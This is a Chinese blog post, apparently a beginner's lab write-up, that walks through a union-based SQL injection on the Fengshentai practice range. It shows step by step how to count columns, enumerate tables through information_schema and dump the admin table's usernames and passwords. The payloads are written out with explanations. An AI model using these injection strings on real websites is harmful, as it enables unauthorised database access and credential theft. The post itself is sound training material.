網路安全1 1

2021-10-04 07:04:51 字數 2607 閱讀 4687

宣告:練習僅可在靶場,不可用於非法操作。

最近學習了一下網路安全的入門的相關操作,無意中找到了乙個叫做封神台的靶場,搭配裡邊的教程學習了一下,感覺還是不錯的,雖然大學學習了一些關於密碼學的知識,在實際操作時,還是有一定的難度,初學者,經驗能力還不夠,寫一篇文章記錄一下。

輸入第一條頁面顯示正常,輸入第二條頁面顯示錯誤,因此,可能存在sql注入漏洞。

and 1=1 order by 1

and 1=1 order by 2

and 1=1 order by 3

依次輸入上面的三條url(只是修改了引數請求),前兩條顯示正常,第三條顯示錯誤。說明,頁面資料庫的字段數為2。

資料庫的字段在這裡回顧一下:

便於理解,資料庫字段通俗點講就是說在資料庫中建立的表的列,如下圖表中含有兩個欄位username,password:

and 1=2 union select 1,2
and 1=2:使頁面處在報錯的引數值。

union :連線sql 操作。

select 1,2:資料庫公有兩個字段,因此,觀察一下兩個字段分別在網頁的什麼地方輸出。

輸入上面的url後,網頁中顯示出了字段2所在的位置,因此,接下來我們可以借助欄位2 將我們是需要的資料庫資訊展示出來。

(1)查詢頁面包含資料庫

網頁的資料庫名字為:maoshe 

(2)查詢資料庫版本

資料庫版本為:5.5.53

(3)查詢資料庫所包含的表

and 1=2 union select 1,group_concat(table_name) from information_schema.tables --
group_concat(items1,items2....):作用是將所要查詢的資訊連線在一起輸出,如果不用,查詢的資訊只能顯示一條。

information_schema:mysql資料庫的乙個特殊的表,包含當前資料庫的所有資料資訊。

通過結果可以發現,資料庫中的表很多,因此,需要縮小查詢範圍。

and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--
table_schema=database():查詢的資料庫為當前資料庫 。

從查詢結果可以看出,當前網頁的資料庫表有四個,顯然,admin這個表一般是與管理員有關的資訊。 

緊接著需要查詢admin表中有哪些字段(列)

終於找到了一些比較有價值的東西,下面,繼續查詢username,password資訊

and 1=2 union select 1,group_concat(username,',',password) from admin--
group_concat(username,',',password):查詢使用者名稱和密碼,中間用逗號分隔。

最終,拿到了當前頁面的資料庫管理資訊:管理員名和密碼。

網路安全課 11 訪問控制

開放某一層所提供的服務用以保證系統或資料傳輸足夠的安全性 根據iso7498 2,安全服務包括 1.實體認證 entity authentication 2.資料保密性 data confidentiality 3.資料完整性 data integrity 4.防抵賴 non repudiation...

網路安全策略和網路安全機制

考研初試專業課中的乙個題目,考的是有關安全機制和安全策略有關的方面,在專業課教材裡翻了好久沒有找到相關的內容,拿到複試的教材後發現才裡面有提到 於是今天拿出來總結一下好了安全策略是指在乙個特定的環境裡,為保證提供一定安全級別的安全保護所必須遵守的規則。主要包括以下內容 隨著應用環境的不同 實施客體的...

網路安全 PKI

網路安全 pki 我們都知道,計算機網路上沒有絕對的安全,所以為咯實現資料安全傳輸,只有通過各種加密傳輸盡可能保證資料完整性和真實性。常見的加密演算法有單向加密,對稱加密,非對稱加密。單向加密一般用於資料完整性 提取特徵碼 對稱加密速度快,一般用於資料加密 非對稱加密速度慢,一般只用於身份驗證。現在...